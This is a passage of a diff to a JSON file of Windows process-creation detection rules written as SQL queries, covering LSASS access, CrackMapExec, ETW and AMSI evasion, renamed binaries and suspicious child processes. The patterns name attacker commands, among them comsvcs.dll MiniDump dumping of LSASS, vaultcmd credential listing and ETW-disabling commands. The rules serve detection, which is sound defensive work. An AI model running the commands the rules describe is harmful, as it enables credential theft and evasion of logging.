"attack.t1559" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "status": "test", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1185" + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as 